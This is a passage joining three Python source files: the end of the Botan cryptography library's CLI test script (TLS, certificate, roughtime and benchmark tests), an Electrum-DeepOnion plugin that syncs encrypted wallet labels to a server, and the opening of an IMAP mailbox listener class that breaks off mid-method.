"BQAAAEAAAABAAAAApAAAADwBAABTSUcAUEFUSFNSRVBDRVJUSU5EWN5Y0b2irPS1JgqJFQMciPg4aWd9qj1ZqcJc5bGXe1m4ZdAXa5OIhXa0+680MgpyhEHhqYJDIwH1XRa1OZx5YAUDAAAABAAAAAwAAABSQURJTUlEUFJPT1RAQg8AgBW3iFaSBQD9WI+Qr6NOZsDmP0PsnCo66mstM3ac5ZON+I+ZeEK8lZWBASvsD2JIfq3v4d1QH5g4STs3wOazQPc25Puy659ZAgAAAEAAAABTSUcAREVMRUJbs67Sb5Wx/jzWyT1PhWR0c4kg59tjSGofo8R3eHzcA9CGwavuRdxOArhVWWODG99gYgfmjcRLgt9/jH+99w4DAAAAIAAAACgAAABQVUJLTUlOVE1BWFRXRfQ1RHLWGOgqABUTYfVBDZrv3OL2nPLYve9ldfNVLOjdPVFFkgUA6D0Vb1mSBQAAAAAA", ] server_request = request[0] server_response = response[0] test_cli("roughtime", [], expected_stderr=b'Please specify either --servers-file or --host and --pubkey\n') with open(ecosystem, 'w') as f: f.write("Cloudflare-Roughtime ed25519 gD63hSj4ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= udp 127.0.0.1:" + str(server_port)) test_cli("roughtime", [ "--check-local-clock=0", "--chain-file=", "--servers-file=" + ecosystem] , expected_stderr=b'ERROR: Public key does not match!\n') with open(ecosystem, 'w') as f: f.write("Cloudflare-Roughtime ed25519 gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo= udp 127.0.0.1:" + str(server_port)) test_cli("roughtime", [ "--chain-file=", "--servers-file=" + ecosystem] , expected_stderr=b'ERROR: Local clock mismatch\n') test_cli("roughtime", [ "--check-local-clock=0", "--chain-file=" + chain_file, "--servers-file=" + ecosystem] , "Cloudflare-Roughtime : UTC 2019-09-12T08:00:11 (+-1000000us)") with open(chain_file, 'r') as f: read_data = f.read() if read_data != chain[0]: logging.error("unexpected chain") server_request = request[1] server_response = response[1] test_cli("roughtime", [ "--check-local-clock=0", "--chain-file=" + chain_file, "--host=127.0.0.1:" + str(server_port), "--pubkey=gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo=", "--raw-time"] , "UTC 1568275214691000 (+-1000000us)") with open(chain_file, 'r') as f: read_data = f.read() if read_data != chain[1]: logging.error("unexpected chain") server_request = request[2] server_response = response[2] test_cli("roughtime", [ "--check-local-clock=0", "--chain-file=" + chain_file, "--host=127.0.0.1:" + str(server_port), "--pubkey=gD63hSj3ScS+wuOeGrubXlq35N1c5Lby/S+T7MNTjxo=", "--max-chain-size=2"] , "UTC 2019-09-12T08:00:42 (+-1000000us)") with open(chain_file, 'r') as f: read_data = f.read() if read_data != chain[2]: logging.error("unexpected chain") def cli_pk_workfactor_tests(_tmp_dir): test_cli("pk_workfactor", "1024", "80") test_cli("pk_workfactor", "2048", "111") test_cli("pk_workfactor", ["--type=rsa", "512"], "58") test_cli("pk_workfactor", ["--type=dl", "512"], "58") test_cli("pk_workfactor", ["--type=dl_exp", "512"], "128") def cli_dl_group_info_tests(_tmp_dir): dl_output = re.compile('(P|G) = [A-F0-9]+') for bits in [1024, 1536, 2048, 3072, 4096, 6144, 8192]: output = test_cli("dl_group_info", "modp/ietf/%d" % (bits)) lines = output.split('\n') if len(lines) != 2: logging.error('Unexpected output from dl_group_info') for l in lines: if not dl_output.match(l): logging.error('Unexpected output from dl_group_info') def cli_ec_group_info_tests(_tmp_dir): # pylint: disable=line-too-long secp256r1_info = """P = FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF A = FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFC B = 5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B N = FFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551 G = 6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5""" secp256r1_pem = """-----BEGIN EC PARAMETERS----- MIHgAgEBMCwGByqGSM49AQECIQD/////AAAAAQAAAAAAAAAAAAAAAP////////// /////zBEBCD/////AAAAAQAAAAAAAAAAAAAAAP///////////////AQgWsY12Ko6 k+ez671VdpiGvGUdBrDMU7D2O848PifSYEsEQQRrF9Hy4SxCR/i85uVjpEDydwN9 gS3rM6D0oTlF2JjClk/jQuL+Gn+bjufrSnwPnhYrzjNXazFezsu2QGg3v1H1AiEA /////wAAAAD//////////7zm+q2nF56E87nKwvxjJVECAQE= -----END EC PARAMETERS-----""" test_cli("ec_group_info", "secp256r1", secp256r1_info) test_cli("ec_group_info", "--pem secp256r1", secp256r1_pem) def cli_cpuid_tests(_tmp_dir): cpuid_output = test_cli("cpuid", []) if not cpuid_output.startswith('CPUID flags:'): logging.error('Unexpected cpuid output "%s"' % (cpuid_output)) flag_re = re.compile('[a-z0-9_]+') flags = cpuid_output[13:].split(' ') for flag in flags: if flag != '' and flag_re.match(flag) is None: logging.error('Unexpected CPUID flag name "%s"' % (flag)) def cli_cc_enc_tests(_tmp_dir): test_cli("cc_encrypt", ["8028028028028029", "pass"], "4308989841607208") test_cli("cc_decrypt", ["4308989841607208", "pass"], "8028028028028027") def cli_cert_issuance_tests(tmp_dir): root_key = os.path.join(tmp_dir, 'root.key') root_crt = os.path.join(tmp_dir, 'root.crt') int_key = os.path.join(tmp_dir, 'int.key') int_crt = os.path.join(tmp_dir, 'int.crt') int_csr = os.path.join(tmp_dir, 'int.csr') leaf_key = os.path.join(tmp_dir, 'leaf.key') leaf_crt = os.path.join(tmp_dir, 'leaf.crt') leaf_csr = os.path.join(tmp_dir, 'leaf.csr') test_cli("keygen", ["--params=2048", "--output=" + root_key], "") test_cli("keygen", ["--params=2048", "--output=" + int_key], "") test_cli("keygen", ["--params=2048", "--output=" + leaf_key], "") test_cli("gen_self_signed", [root_key, "Root", "--ca", "--path-limit=2", "--output="+root_crt], "") test_cli("gen_pkcs10", "%s Intermediate --ca --output=%s" % (int_key, int_csr)) test_cli("sign_cert", "%s %s %s --output=%s" % (root_crt, root_key, int_csr, int_crt)) test_cli("gen_pkcs10", "%s Leaf --output=%s" % (leaf_key, leaf_csr)) test_cli("sign_cert", "%s %s %s --output=%s" % (int_crt, int_key, leaf_csr, leaf_crt)) test_cli("cert_verify" "%s %s %s" % (leaf_crt, int_crt, root_crt), "Certificate passes validation checks") def cli_timing_test_tests(_tmp_dir): timing_tests = ["bleichenbacher", "manger", "ecdsa", "ecc_mul", "inverse_mod", "pow_mod", "lucky13sec3", "lucky13sec4sha1", "lucky13sec4sha256", "lucky13sec4sha384"] output_re = re.compile('[0-9]+;[0-9];[0-9]+') for suite in timing_tests: output = test_cli("timing_test", [suite, "--measurement-runs=16", "--warmup-runs=3"], None).split('\n') for line in output: if output_re.match(line) is None: logging.error("Unexpected output in timing_test %s: %s", suite, line) def cli_tls_ciphersuite_tests(_tmp_dir): policies = ['default', 'suiteb_128', 'suiteb_192', 'strict', 'all'] versions = ['tls1.0', 'tls1.1', 'tls1.2'] ciphersuite_re = re.compile('^[A-Z0-9_]+$') for policy in policies: for version in versions: if version != 'tls1.2' and policy != 'all': continue output = test_cli("tls_ciphers", ["--version=" + version, "--policy=" + policy], None).split('\n') for line in output: if ciphersuite_re.match(line) is None: logging.error("Unexpected ciphersuite line %s", line) def cli_asn1_tests(_tmp_dir): input_pem = """-----BEGIN BLOB----- MCACAQUTBnN0cmluZzEGAQH/AgFjBAUAAAAAAAMEAP///w== -----END BLOB------ """ expected = """d= 0, l= 32: SEQUENCE d= 1, l= 1: INTEGER 05 d= 1, l= 6: PRINTABLE STRING string d= 1, l= 6: SET d= 2, l= 1: BOOLEAN true d= 2, l= 1: INTEGER 63 d= 1, l= 5: OCTET STRING 0000000000 d= 1, l= 4: BIT STRING FFFFFF""" test_cli("asn1print", "--pem -", expected, input_pem) def cli_tls_socket_tests(tmp_dir): client_msg = b'Client message %d\n' % (random.randint(0, 2**128)) server_port = random_port_number() priv_key = os.path.join(tmp_dir, 'priv.pem') ca_cert = os.path.join(tmp_dir, 'ca.crt') crt_req = os.path.join(tmp_dir, 'crt.req') server_cert = os.path.join(tmp_dir, 'server.crt') test_cli("keygen", ["--algo=ECDSA", "--params=secp256r1", "--output=" + priv_key], "") test_cli("gen_self_signed", [priv_key, "CA", "--ca", "--country=VT", "--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert], "") test_cli("cert_verify", ca_cert, "Certificate did not validate - Cannot establish trust") test_cli("gen_pkcs10", "%s localhost --output=%s" % (priv_key, crt_req)) test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, server_cert)) tls_server = subprocess.Popen([CLI_PATH, 'tls_server', '--max-clients=1', '--port=%d' % (server_port), server_cert, priv_key], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) time.sleep(.5) tls_client = subprocess.Popen([CLI_PATH, 'tls_client', 'localhost', '--port=%d' % (server_port), '--trusted-cas=%s' % (ca_cert)], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) time.sleep(.5) tls_client.stdin.write(client_msg) tls_client.stdin.flush() time.sleep(.5) (stdout, stderr) = tls_client.communicate() if stderr: logging.error("Got unexpected stderr output %s" % (stderr)) if b'Handshake complete' not in stdout: logging.error('Failed to complete handshake: %s' % (stdout)) if client_msg not in stdout: logging.error("Missing client message from stdout %s" % (stdout)) tls_server.communicate() def cli_tls_http_server_tests(tmp_dir): if not check_for_command("tls_http_server"): return try: from http.client import HTTPSConnection except ImportError: try: from httplib import HTTPSConnection except ImportError: return import ssl server_port = random_port_number() priv_key = os.path.join(tmp_dir, 'priv.pem') ca_cert = os.path.join(tmp_dir, 'ca.crt') crt_req = os.path.join(tmp_dir, 'crt.req') server_cert = os.path.join(tmp_dir, 'server.crt') test_cli("keygen", ["--algo=ECDSA", "--params=secp384r1", "--output=" + priv_key], "") test_cli("gen_self_signed", [priv_key, "CA", "--ca", "--country=VT", "--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert], "") test_cli("gen_pkcs10", "%s localhost --output=%s" % (priv_key, crt_req)) test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, server_cert)) tls_server = subprocess.Popen([CLI_PATH, 'tls_http_server', '--max-clients=2', '--port=%d' % (server_port), server_cert, priv_key], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) time.sleep(.5) context = ssl.create_default_context(cafile=ca_cert) conn = HTTPSConnection('localhost', port=server_port, context=context) conn.request("GET", "/") resp = conn.getresponse() if resp.status != 200: logging.error('Unexpected response status %d' % (resp.status)) body = str(resp.read()) if body.find('TLS negotiation with Botan 2.') < 0: logging.error('Unexpected response body') conn.request("POST", "/logout") resp = conn.getresponse() if resp.status != 405: logging.error('Unexpected response status %d' % (resp.status)) if sys.version_info.major >= 3: rc = tls_server.wait(5) # pylint: disable=too-many-function-args else: rc = tls_server.wait() if rc != 0: logging.error("Unexpected return code from https_server %d", rc) def cli_tls_proxy_tests(tmp_dir): # pylint: disable=too-many-locals,too-many-statements if not check_for_command("tls_proxy"): return try: from http.client import HTTPSConnection except ImportError: try: from httplib import HTTPSConnection except ImportError: return try: from http.server import HTTPServer, BaseHTTPRequestHandler except ImportError: try: from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler except ImportError: return import ssl import threading server_port = random_port_number() proxy_port = random_port_number() while server_port == proxy_port: proxy_port = random_port_number() priv_key = os.path.join(tmp_dir, 'priv.pem') ca_cert = os.path.join(tmp_dir, 'ca.crt') crt_req = os.path.join(tmp_dir, 'crt.req') server_cert = os.path.join(tmp_dir, 'server.crt') test_cli("keygen", ["--algo=ECDSA", "--params=secp384r1", "--output=" + priv_key], "") test_cli("gen_self_signed", [priv_key, "CA", "--ca", "--country=VT", "--dns=ca.example", "--hash=SHA-384", "--output="+ca_cert], "") test_cli("gen_pkcs10", "%s localhost --output=%s" % (priv_key, crt_req)) test_cli("sign_cert", "%s %s %s --output=%s" % (ca_cert, priv_key, crt_req, server_cert)) tls_proxy = subprocess.Popen([CLI_PATH, 'tls_proxy', str(proxy_port), '127.0.0.1', str(server_port), server_cert, priv_key, '--output=/tmp/proxy.err', '--max-clients=2'], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) time.sleep(.5) server_response = binascii.hexlify(os.urandom(32)) def run_http_server(): class Handler(BaseHTTPRequestHandler): def do_GET(self): # pylint: disable=invalid-name self.send_response(200) self.end_headers() self.wfile.write(server_response) httpd = HTTPServer(('', server_port), Handler) httpd.serve_forever() http_thread = threading.Thread(target=run_http_server) http_thread.daemon = True http_thread.start() time.sleep(.5) context = ssl.create_default_context(cafile=ca_cert) for _i in range(2): conn = HTTPSConnection('localhost', port=proxy_port, context=context) conn.request("GET", "/") resp = conn.getresponse() if resp.status != 200: logging.error('Unexpected response status %d' % (resp.status)) body = resp.read() if body != server_response: logging.error('Unexpected response from server %s' % (body)) if sys.version_info.major >= 3: rc = tls_proxy.wait(5) # pylint: disable=too-many-function-args else: rc = tls_proxy.wait() if rc != 0: logging.error('Unexpected return code %d', rc) def cli_trust_root_tests(tmp_dir): pem_file = os.path.join(tmp_dir, 'pems') dn_file = os.path.join(tmp_dir, 'dns') test_cli("trust_roots", ['--dn-only', '--output=%s' % (dn_file)], "") dn_re = re.compile('(.+=\".+\")(,.+=\".+\")') for line in open(dn_file): if dn_re.match(line) is None: logging.error("Unexpected DN line %s", line) test_cli("trust_roots", ['--output=%s' % (pem_file)], "") def cli_tss_tests(tmp_dir): data_file = os.path.join(tmp_dir, 'data') exp_hash = "53B3C59276AE30EA7FD882268E80FD96AD80CC9FEB15F9FB940E7C4B5CF80B9E" test_cli("rng", ["32", "--output=%s" % (data_file)], "") test_cli("hash", ["--no-fsname", data_file], exp_hash) m = 3 n = 5 test_cli("tss_split", [str(m), str(n), data_file, "--share-prefix=%s/split" % (tmp_dir)], "") share_files = [] for i in range(1, n+1): share = os.path.join(tmp_dir, "split%d.tss" % (i)) if not os.access(share, os.R_OK): logging.error("Failed to create expected split file %s", share) share_files.append(share) rec5 = os.path.join(tmp_dir, "recovered_5") test_cli("tss_recover", share_files + ["--output=%s" % (rec5)], "") test_cli("hash", ["--no-fsname", rec5], exp_hash) rec4 = os.path.join(tmp_dir, "recovered_4") test_cli("tss_recover", share_files[1:] + ["--output=%s" % (rec4)], "") test_cli("hash", ["--no-fsname", rec4], exp_hash) rec3 = os.path.join(tmp_dir, "recovered_3") test_cli("tss_recover", share_files[2:] + ["--output=%s" % (rec3)], "") test_cli("hash", ["--no-fsname", rec3], exp_hash) rec2 = os.path.join(tmp_dir, "recovered_2") test_cli("tss_recover", share_files[3:] + ["--output=%s" % (rec2)], "", None, b'Error: Insufficient shares to do TSS reconstruction\n') def cli_pk_encrypt_tests(tmp_dir): input_file = os.path.join(tmp_dir, 'input') ctext_file = os.path.join(tmp_dir, 'ctext') recovered_file = os.path.join(tmp_dir, 'recovered') rsa_priv_key = os.path.join(tmp_dir, 'rsa.priv') rsa_pub_key = os.path.join(tmp_dir, 'rsa.pub') test_cli("keygen", ["--algo=RSA", "--provider=base", "--params=2048", "--output=%s" % (rsa_priv_key)], "") key_hash = "72AF3227EF57A728E894D54623EB8E2C0CD11A4A98BF2DF32DB052BF60897873" test_cli("hash", ["--no-fsname", "--algo=SHA-256", rsa_priv_key], key_hash) test_cli("pkcs8", ["--pub-out", "%s/rsa.priv" % (tmp_dir), "--output=%s" % (rsa_pub_key)], "") # Generate a random input file test_cli("rng", ["10", "16", "32", "--output=%s" % (input_file)], "") # Because we used a fixed DRBG for each invocation the same ctext is generated each time rng_output_hash = "32F5E7B61357DE8397EFDA1E598379DFD5EE21767BDF4E2A435F05117B836AC6" ctext_hash = "FF1F0EEC2C42DD61D78505C5DF624A19AE6FE2BAB0B8F7D878C7655D54C68FE0" test_cli("hash", ["--no-fsname", "--algo=SHA-256", input_file], rng_output_hash) # Encrypt and verify ciphertext is the expected value test_cli("pk_encrypt", [rsa_pub_key, input_file, "--output=%s" % (ctext_file)], "") test_cli("hash", ["--no-fsname", "--algo=SHA-256", ctext_file], ctext_hash) # Decrypt and verify plaintext is recovered test_cli("pk_decrypt", [rsa_priv_key, ctext_file, "--output=%s" % (recovered_file)], "") test_cli("hash", ["--no-fsname", "--algo=SHA-256", recovered_file], rng_output_hash) def cli_uuid_tests(_tmp_dir): test_cli("uuid", [], "D80F88F6-ADBE-45AC-B10C-3602E67D985B") uuid_re = re.compile(r'[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}') output = test_cli("uuid", []) if uuid_re.match(output) is None: logging.error('Bad uuid output %s' % (output)) def cli_tls_client_hello_tests(_tmp_dir): # pylint: disable=line-too-long chello = "16030100cf010000cb03035b3cf2457b864d7bef2a4b1f84fc3ced2b68d9551f3455ffdd305af277a91bb200003a16b816b716ba16b9cca9cca8c02cc030c02bc02fc0adc0acc024c00ac028c014c023c009c027c013ccaa009f009ec09fc09e006b003900670033010000680000000e000c000009676d61696c2e636f6d000500050100000000000a001a0018001d0017001a0018001b0019001c01000101010201030104000b00020100000d00140012080508040806050106010401050306030403001600000017000000230000ff01000100" output = test_cli("tls_client_hello", ["--hex", "-"], None, chello) output_hash = "8EBFC3205ACFA98461128FE5D081D19254237AF84F7DAF000A3C992C3CF6DE44" test_cli("hash", ["--no-fsname", "--algo=SHA-256", "-"], output_hash, output) def cli_speed_tests(_tmp_dir): # pylint: disable=too-many-branches msec = 1 output = test_cli("speed", ["--msec=%d" % (msec), "--buf-size=64,512", "AES-128"], None).split('\n') if len(output) % 4 != 0: logging.error("Unexpected number of lines for AES-128 speed test") # pylint: disable=line-too-long format_re = re.compile(r'^AES-128 .* buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB\/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms\)') for line in output: if format_re.match(line) is None: logging.error("Unexpected line %s", line) output = test_cli("speed", ["--msec=%d" % (msec), "ChaCha20", "SHA-256", "HMAC(SHA-256)"], None).split('\n') # pylint: disable=line-too-long format_re = re.compile(r'^.* buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB\/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms\)') for line in output: if format_re.match(line) is None: logging.error("Unexpected line %s", line) output = test_cli("speed", ["--msec=%d" % (msec), "AES-128/GCM"], None).split('\n') format_re_ks = re.compile(r'^AES-128/GCM\(16\).* [0-9]+ key schedule/sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9\.]+ ms\)') format_re_cipher = re.compile(r'^AES-128/GCM\(16\) .* buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB\/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms\)') for line in output: if format_re_ks.match(line) is None: if format_re_cipher.match(line) is None: logging.error('Unexpected line %s', line) pk_algos = ["ECDSA", "ECDH", "SM2", "ECKCDSA", "ECGDSA", "GOST-34.10", "DH", "DSA", "ElGamal", "Ed25519", "Curve25519", "NEWHOPE", "McEliece", "RSA", "XMSS"] output = test_cli("speed", ["--msec=%d" % (msec)] + pk_algos, None).split('\n') # ECDSA-secp256r1 106 keygen/sec; 9.35 ms/op 37489733 cycles/op (1 op in 9 ms) format_re = re.compile(r'^.* [0-9]+ ([A-Za-z ]+)/sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9\.]+ ms\)') for line in output: if format_re.match(line) is None: logging.error("Unexpected line %s", line) # these all have a common output format math_ops = ['mp_mul', 'mp_div', 'mp_div10', 'modexp', 'random_prime', 'inverse_mod', 'rfc3394', 'fpe_fe1', 'ecdsa_recovery', 'ecc_init', 'poly_dbl', 'bn_redc', 'nistp_redc', 'ecc_mult', 'ecc_ops', 'os2ecp', 'primality_test', 'bcrypt', 'passhash9', 'argon2'] format_re = re.compile(r'^.* [0-9]+ /sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9]+(\.[0-9]+)? ms\)') for op in math_ops: output = test_cli("speed", ["--msec=%d" % (msec), op], None).split('\n') for line in output: if format_re.match(line) is None: logging.error("Unexpected line %s", line) output = test_cli("speed", ["--msec=%d" % (msec), "scrypt"], None).split('\n') format_re = re.compile(r'^scrypt-[0-9]+-[0-9]+-[0-9]+ \([0-9]+ MiB\) [0-9]+ /sec; [0-9]+\.[0-9]+ ms/op .*\([0-9]+ (op|ops) in [0-9\.]+ ms\)') for line in output: if format_re.match(line) is None: logging.error("Unexpected line %s", line) output = test_cli("speed", ["--msec=%d" % (msec), "RNG"], None).split('\n') # ChaCha_RNG generate buffer size 1024 bytes: 954.431 MiB/sec 4.01 cycles/byte (477.22 MiB in 500.00 ms) format_re = re.compile(r'^.* generate buffer size [0-9]+ bytes: [0-9]+\.[0-9]+ MiB/sec .*\([0-9]+\.[0-9]+ MiB in [0-9]+\.[0-9]+ ms') for line in output: if format_re.match(line) is None: logging.error("Unexpected line %s", line) # Entropy source rdseed output 128 bytes estimated entropy 0 in 0.02168 ms total samples 32 output = test_cli("speed", ["--msec=%d" % (msec), "entropy"], None).split('\n') format_re = re.compile(r'^Entropy source [_a-z0-9]+ output [0-9]+ bytes estimated entropy [0-9]+ in [0-9]+\.[0-9]+ ms .*total samples [0-9]+') for line in output: if format_re.match(line) is None: logging.error("Unexpected line %s", line) output = test_cli("speed", ["--msec=%d" % (msec), "--format=json", "AES-128"], None) json_blob = json.loads(output) if len(json_blob) < 2: logging.error("Unexpected size for JSON output") for b in json_blob: for field in ['algo', 'op', 'events', 'bps', 'buf_size', 'nanos']: if field not in b: logging.error('Missing field %s in JSON record %s' % (field, b)) def main(args=None): if args is None: args = sys.argv parser = optparse.OptionParser( formatter=optparse.IndentedHelpFormatter(max_help_position=50)) parser.add_option('--verbose', action='store_true', default=False) parser.add_option('--quiet', action='store_true', default=False) (options, args) = parser.parse_args(args) setup_logging(options) if len(args) < 2: logging.error("Usage: ./cli_tests.py path_to_botan_cli [test_regex]") return 1 if not os.access(args[1], os.X_OK): logging.error("Could not access/execute %s", args[1]) return 2 global CLI_PATH CLI_PATH = args[1] test_regex = None if len(args) == 3: try: test_regex = re.compile(args[2]) except re.error as e: logging.error("Invalid regex: %s", str(e)) return 1 start_time = time.time() test_fns = [ cli_argon2_tests, cli_asn1_tests, cli_base32_tests, cli_base58_tests, cli_base64_tests, cli_bcrypt_tests, cli_cc_enc_tests, cli_cert_issuance_tests, cli_compress_tests, cli_config_tests, cli_cpuid_tests, cli_dl_group_info_tests, cli_ec_group_info_tests, cli_entropy_tests, cli_factor_tests, cli_gen_dl_group_tests, cli_gen_prime_tests, cli_hash_tests, cli_help_tests, cli_hex_tests, cli_hmac_tests, cli_is_prime_tests, cli_key_tests, cli_xmss_sign_tests, cli_mod_inverse_tests, cli_pbkdf_tune_tests, cli_pk_encrypt_tests, cli_pk_workfactor_tests, cli_psk_db_tests, cli_rng_tests, cli_roughtime_check_tests, cli_roughtime_tests, cli_speed_tests, cli_timing_test_tests, cli_tls_ciphersuite_tests, cli_tls_client_hello_tests, cli_tls_http_server_tests, cli_tls_proxy_tests, cli_tls_socket_tests, cli_trust_root_tests, cli_tss_tests, cli_uuid_tests, cli_version_tests, ] for fn in test_fns: fn_name = fn.__name__ if test_regex is not None: if test_regex.search(fn_name) is None: continue logging.info("Running %s" % (fn_name)) start = time.time() tmp_dir = tempfile.mkdtemp(prefix='botan_cli_') try: fn(tmp_dir) except Exception as e: # pylint: disable=broad-except logging.error("Test %s threw exception: %s", fn_name, e) shutil.rmtree(tmp_dir) end = time.time() logging.debug("Ran %s in %.02f sec", fn_name, end-start) end_time = time.time() print("Ran %d tests with %d failures in %.02f seconds" % ( TESTS_RUN, TESTS_FAILED, end_time - start_time)) if TESTS_FAILED > 0: return 1 return 0 if __name__ == '__main__': sys.exit(main())
labels.py
import hashlib import requests import threading import json import sys import traceback import base64 import electrum_deeponion as electrum from electrum_deeponion.plugins import BasePlugin, hook from electrum_deeponion.i18n import _ class LabelsPlugin(BasePlugin): def __init__(self, parent, config, name): BasePlugin.__init__(self, parent, config, name) self.target_host = 'labels.electrum.org' self.wallets = {} def encode(self, wallet, msg): password, iv, wallet_id = self.wallets[wallet] encrypted = electrum.bitcoin.aes_encrypt_with_iv(password, iv, msg.encode('utf8')) return base64.b64encode(encrypted).decode() def decode(self, wallet, message): password, iv, wallet_id = self.wallets[wallet] decoded = base64.b64decode(message) decrypted = electrum.bitcoin.aes_decrypt_with_iv(password, iv, decoded) return decrypted.decode('utf8') def get_nonce(self, wallet): # nonce is the nonce to be used with the next change nonce = wallet.storage.get('wallet_nonce') if nonce is None: nonce = 1 self.set_nonce(wallet, nonce) return nonce def set_nonce(self, wallet, nonce): self.print_error("set", wallet.basename(), "nonce to", nonce) wallet.storage.put("wallet_nonce", nonce) @hook def set_label(self, wallet, item, label): if wallet not in self.wallets: return if not item: return nonce = self.get_nonce(wallet) wallet_id = self.wallets[wallet][2] bundle = {"walletId": wallet_id, "walletNonce": nonce, "externalId": self.encode(wallet, item), "encryptedLabel": self.encode(wallet, label)} t = threading.Thread(target=self.do_request_safe, args=["POST", "/label", False, bundle]) t.setDaemon(True) t.start() # Caller will write the wallet self.set_nonce(wallet, nonce + 1) def do_request(self, method, url = "/labels", is_batch=False, data=None): url = 'https://' + self.target_host + url kwargs = {'headers': {}} if method == 'GET' and data: kwargs['params'] = data elif method == 'POST' and data: kwargs['data'] = json.dumps(data) kwargs['headers']['Content-Type'] = 'application/json' response = requests.request(method, url, **kwargs) if response.status_code != 200: raise Exception(response.status_code, response.text) response = response.json() if "error" in response: raise Exception(response["error"]) return response def do_request_safe(self, *args, **kwargs): try: self.do_request(*args, **kwargs) except BaseException as e: #traceback.print_exc(file=sys.stderr) self.print_error('error doing request') def push_thread(self, wallet): wallet_data = self.wallets.get(wallet, None) if not wallet_data: raise Exception('Wallet {} not loaded'.format(wallet)) wallet_id = wallet_data[2] bundle = {"labels": [], "walletId": wallet_id, "walletNonce": self.get_nonce(wallet)} for key, value in wallet.labels.items(): try: encoded_key = self.encode(wallet, key) encoded_value = self.encode(wallet, value) except: self.print_error('cannot encode', repr(key), repr(value)) continue bundle["labels"].append({'encryptedLabel': encoded_value, 'externalId': encoded_key}) self.do_request("POST", "/labels", True, bundle) def pull_thread(self, wallet, force): wallet_data = self.wallets.get(wallet, None) if not wallet_data: raise Exception('Wallet {} not loaded'.format(wallet)) wallet_id = wallet_data[2] nonce = 1 if force else self.get_nonce(wallet) - 1 self.print_error("asking for labels since nonce", nonce) response = self.do_request("GET", ("/labels/since/%d/for/%s" % (nonce, wallet_id) )) if response["labels"] is None: self.print_error('no new labels') return result = {} for label in response["labels"]: try: key = self.decode(wallet, label["externalId"]) value = self.decode(wallet, label["encryptedLabel"]) except: continue try: json.dumps(key) json.dumps(value) except: self.print_error('error: no json', key) continue result[key] = value for key, value in result.items(): if force or not wallet.labels.get(key): wallet.labels[key] = value self.print_error("received %d labels" % len(response)) # do not write to disk because we're in a daemon thread wallet.storage.put('labels', wallet.labels) self.set_nonce(wallet, response["nonce"] + 1) self.on_pulled(wallet) def pull_thread_safe(self, wallet, force): try: self.pull_thread(wallet, force) except BaseException as e: # traceback.print_exc(file=sys.stderr) self.print_error('could not retrieve labels') def start_wallet(self, wallet): nonce = self.get_nonce(wallet) self.print_error("wallet", wallet.basename(), "nonce is", nonce) mpk = wallet.get_fingerprint() if not mpk: return mpk = mpk.encode('ascii') password = hashlib.sha1(mpk).hexdigest()[:32].encode('ascii') iv = hashlib.sha256(password).digest()[:16] wallet_id = hashlib.sha256(mpk).hexdigest() self.wallets[wallet] = (password, iv, wallet_id) # If there is an auth token we can try to actually start syncing t = threading.Thread(target=self.pull_thread_safe, args=(wallet, False)) t.setDaemon(True) t.start() def stop_wallet(self, wallet): self.wallets.pop(wallet, None)
mailbox_listener.py
from typing import Dict, Any, Tuple, Optional import contextlib import email import os import threading import imapclient.response_types from .mailbox_tasks import MailboxTasks from .packet import Packet, PlainPacket, SecurePacket from ..credential import Credential from . import socket_context, imapclient class MailboxListener(MailboxTasks): __store: imapclient.IMAPClient __listener: imapclient.IMAPClient __mutex_listener: threading.RLock __selfpipe: Tuple[int, int] __thread_listener: threading.Thread __closed: bool = False @staticmethod def __init_imap(credential: Credential) -> imapclient.IMAPClient: imap = imapclient.IMAPClient(credential.host, credential.port, ssl=True, use_uid=True) imap.login(credential.username, credential.password) imap.select_folder('INBOX') return imap def __init__(self, imap: Credential, **kwargs): super().__init__(**kwargs) self.__store = self.__init_imap(imap) self.__listener = self.__init_imap(imap) self.__mutex_listener = threading.RLock() self.__selfpipe = os.pipe() self.__thread_listener = threading.Thread(target=self.__listen) self.__thread_listener.start() def join(self): super().join() self.__thread_listener.join() def close(self): with self._mutex: if self.__closed: return self.__closed = True super().close() os.close(self.__selfpipe[1]) with self.__mutex_listener: self.__store.logout() self.__listener.logout() self.join() def __listen(self): with self.__mutex_listener: self.__listener.idle() self.__check_new_packets() while True: responses = self.__listener.idle_check(selfpipe=self.__selfpipe[0]) if responses is None: # selfpipe triggered self.__listener.idle_done() return if any(response[1] == b'EXISTS' for response in responses): self.__check_new_packets() # TODO: handle exception def __check_new_packets(self): self.__store.noop() uids = self.__store.search('UNSEEN') messages = self.__store.fetch(uids, ['BODY.PEEK[]']) seens = [] for uid, message in messages.items(): if 